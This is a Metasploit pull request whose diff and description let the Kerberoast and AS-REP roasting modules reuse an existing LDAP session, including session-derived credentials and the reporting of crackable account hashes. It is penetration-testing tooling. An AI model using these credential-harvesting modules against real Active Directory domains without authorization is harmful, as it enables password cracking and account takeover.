### PR TITLE
LDAP sessions working for Kerberoast and AS-REP modules

### DIFF
--- a/lib/msf/core/exploit/remote/kerberos/client.rb
+++ b/lib/msf/core/exploit/remote/kerberos/client.rb
@@ -130,9 +130,14 @@ module Msf
           # @option opts [<String, Integer>] :rport
           # @return [Rex::Proto::Kerberos::Client]
           def connect(opts = {})
+            has_session = defined?(session) && session
+            remote_host = has_session ? session.client.peerhost : rhost
+            # Can't use session.client.rport as a fallback here with an LDAP session as that's port 389. We need port 88.
+            remote_port = has_session ? 88 : rport
+
             kerb_client = Rex::Proto::Kerberos::Client.new(
-              host: opts[:rhost] || rhost,
-              port: (opts[:rport] || rport).to_i,
+              host: opts[:rhost] || remote_host,
+              port: (opts[:rport] || remote_port).to_i,
               proxies: opts[:proxies] || proxies,
               timeout: (opts[:timeout] || timeout).to_i,
               context: {

--- a/lib/msf/core/exploit/remote/ldap/queries.rb
+++ b/lib/msf/core/exploit/remote/ldap/queries.rb
@@ -8,7 +8,10 @@ module Msf
   module Exploit::Remote::LDAP
     module Queries
       def run_builtin_ldap_query(queryname)
-        fail_with(Msf::Module::Failure::BadConfig, 'Must provide a username for connecting to LDAP') if datastore['LDAPUsername'].blank?
+        missing_username = datastore['LDAPUsername'].blank?
+        session_missing_or_wrong_type = (session.nil? || !session.is_a?(::Msf::Sessions::LDAP))
+        bad_config = missing_username && session_missing_or_wrong_type
+        fail_with(Msf::Module::Failure::BadConfig, 'Must provide a username for connecting to LDAP, or have an already existing LDAP session') if bad_config
 
         default_config_file_path = File.join(::Msf::Config.data_directory, 'auxiliary', 'gather', 'ldap_query', 'ldap_queries_default.yaml')
         loaded_queries = safe_load_queries(default_config_file_path) || []

--- a/lib/rex/proto/ldap/client.rb
+++ b/lib/rex/proto/ldap/client.rb
@@ -58,6 +58,18 @@ module Rex
           "#{peerhost}:#{peerport}"
         end
 
+        def username
+          @auth[:username]
+        end
+
+        def realm
+          @auth[:domain]
+        end
+
+        def password
+          @auth[:password]
+        end
+
         def use_connection(args)
           @connection_use_mutex.synchronize do
             return super(args)

--- a/modules/auxiliary/gather/asrep.rb
+++ b/modules/auxiliary/gather/asrep.rb
@@ -43,16 +43,11 @@ class MetasploitModule < Msf::Auxiliary
 
     register_options(
       [
-        Opt::RHOSTS(nil, true, 'The target KDC, see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html'),
         OptPath.new('USER_FILE', [ false, 'File containing usernames, one per line' ], conditions: %w[ACTION == BRUTE_FORCE]),
         OptBool.new('USE_RC4_HMAC', [ true, 'Request using RC4 hash instead of default encryption types (faster to crack)', true]),
         OptString.new('Rhostname', [ false, "The domain controller's hostname"], aliases: ['LDAP::Rhostname']),
       ]
     )
-    register_option_group(name: 'SESSION',
-                          description: 'Used when connecting to LDAP over an existing SESSION',
-                          option_names: %w[RHOSTS],
-                          required_options: %w[SESSION RHOSTS])
     register_advanced_options(
       [
         OptEnum.new('LDAP::Auth', [true, 'The Authentication mechanism to use', Msf::Exploit::Remote::AuthOption::NTLM, Msf::Exploit::Remote::AuthOption::LDAP_OPTIONS]),
@@ -82,11 +77,12 @@ class MetasploitModule < Msf::Auxiliary
     user_file = datastore['USER_FILE']
     username = datastore['LDAPUsername']
     if user_file.blank? && username.blank?
-      fail_with(Msf::Module::Failure::BadConfig, 'User file or username must be specified when brute forcing')
+      fail_with(Msf::Module::Failure::BadConfig, 'User file or username must be specified when brute forcing.')
     end
+    verify_option('LDAPDomain')
     if username.present?
       begin
-        roast(datastore['LDAPUsername'])
+        roast(username)
         result_count += 1
       rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError => e
         # User either not present, or requires preauth
@@ -113,36 +109,52 @@ class MetasploitModule < Msf::Auxiliary
     end
   end
 
+  def verify_option(opt)
+    value = datastore[opt]
+    if session.nil? && value.blank?
+      fail_with(Msf::Module::Failure::BadConfig, "You must set the '#{opt}' option when running the module without a pre-existing LDAP session.")
+    end
+  end
+
   def run_ldap
+    verify_option('LDAPDomain')
+
     run_builtin_ldap_query('ENUM_USER_ASREP_ROASTABLE') do |result|
       username = result.samaccountname[0]
       begin
         roast(username)
       rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError => e
-        print_error("#{username} reported as ASREP-roastable, but received error when attempting to retrieve TGT (#{e})")
+        msg = session ? "Session #{session.sid} received an error: #{e}" : "#{username} reported as ASREP-roastable, but received error when attempting to retrieve TGT (#{e})"
+        print_error(msg)
       end
     end
   end
 
   def roast(username)
+    server_name = "krbtgt/#{datastore['domain']}"
+    client_name = username
+    realm = session ? session.client.realm : datastore['LDAPDomain']
+    rhost = session ? session.client.peerhost : datastore['RHOST']
+
     res = send_request_tgt(
-      server_name: "krbtgt/#{datastore['domain']}",
-      client_name: username,
-      realm: datastore['LDAPDomain'],
+      server_name: server_name,
+      client_name: client_name,
+      realm: realm,
       offered_etypes: etypes,
       rport: 88,
-      rhost: datastore['RHOST']
+      rhost: rhost
     )
+
     hash = format_as_rep_to_john_hash(res.as_rep)
     print_line(hash)
     jtr_format = Metasploit::Framework::Hashes.identify_hash(hash)
-    report_hash(hash, jtr_format)
+    report_hash(hash, jtr_format, rhost, 88)
   end
 
-  def report_hash(hash, jtr_format)
+  def report_hash(hash, jtr_format, address, port)
     service_data = {
-      address: rhost,
-      port: rport,
+      address: address,
+      port: port,
       service_name: 'Kerberos',
       protocol: 'tcp',
       workspace_id: myworkspace_id

--- a/modules/auxiliary/gather/kerberoast.rb
+++ b/modules/auxiliary/gather/kerberoast.rb
@@ -44,16 +44,11 @@ class MetasploitModule < Msf::Auxiliary
 
     register_options(
       [
-        Opt::RHOSTS(nil, true, 'The target KDC, see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html'),
         OptString.new('TARGET_USER', [ false, 'Specific user to kerberoast' ]),
         OptString.new('Rhostname', [ false, "The domain controller's hostname"], aliases: ['LDAP::Rhostname']),
         Msf::OptAddress.new('DomainControllerRhost', [false, 'The resolvable rhost for the Domain Controller'], fallbacks: ['rhost']),
       ]
     )
-    register_option_group(name: 'SESSION',
-                          description: 'Used when connecting to LDAP over an existing SESSION',
-                          option_names: %w[RHOSTS],
-                          required_options: %w[SESSION RHOSTS])
     register_advanced_options(
       [
         OptEnum.new('LDAP::Auth', [true, 'The Authentication mechanism to use', Msf::Exploit::Remote::AuthOption::NTLM, Msf::Exploit::Remote::AuthOption::LDAP_OPTIONS]),
@@ -77,7 +72,19 @@ class MetasploitModule < Msf::Auxiliary
     fail_with(Failure::Unknown, "#{e.class}: #{e.message}")
   end
 
+  def verify_option(opt)
+    value = datastore[opt]
+    if session.nil? && value.blank?
+      fail_with(Msf::Module::Failure::BadConfig, "You must set the '#{opt}' option when running the module without a pre-existing LDAP session.")
+    end
+  end
+
+  def verify_options
+    %w[LDAPDomain LDAPUsername LDAPPassword].each { |opt| verify_option(opt) }
+  end
+
   def run_user
+    verify_options
     user = datastore['TARGET_USER']
     filter = "(&(objectClass=user)(sAMAccountName=#{Net::LDAP::Filter.escape(user)}))"
     attributes = ['servicePrincipalName', 'sAMAccountName']
@@ -103,6 +110,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run_ldap
+    verify_options
     jtr_formats = Set.new
     hashes = []
     run_builtin_ldap_query('ENUM_USER_SPNS_KERBEROAST') do |result|
@@ -142,10 +150,13 @@ class MetasploitModule < Msf::Auxiliary
       name_type: Rex::Proto::Kerberos::Model::NameType::NT_SRV_INST,
       name_string: components
     )
-    domain_name = datastore['LDAPDomain']
+    # If we have a session set, we can use the login and domain information from it.
+    # But we need to let the user specify the KDC, as it might not be the Rhost the session is connected to
+    domain_name = session ? session.client.realm : datastore['LDAPDomain']
     rhostname = datastore['DomainControllerRhost']
-    username = datastore['LDAPUsername']
-    password = datastore['LDAPPassword']
+    rhostname ||= session.client.peerhost if session
+    username = session ? session.client.username : datastore['LDAPUsername']
+    password = session ? session.client.password : datastore['LDAPPassword']
     authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base.new(
       host: rhostname,
       realm: domain_name,


### PR DESCRIPTION
This PR allows the Kerberoast and AS-REP modules to run against an already-established LDAP session (nuances with the AS-REP).

Nuance:
Although the Kerberoast module works great over the existing session (it did not work previously due to wrongly configured options), the AS-REP module will not quite use the LDAP session. It will use the session's information such as realm and user, however it will still reach out over port 88 and establish a _new_ connection to the Kerberos service.

## Verification

- [ ] Start `msfconsole`
- [ ] get an LDAP session using ldap_login
- [ ] Run the Kerberoast module against a remote host
- [ ] Run the Kerberoast module against a session
- [ ] Run the AS-REP module against a remote host
- [ ] Run the AS-REP module against a session, setting the `ACTION=LDAP`
- [ ] Verify both modules work with a session as well as rhost values in Metasploit Pro 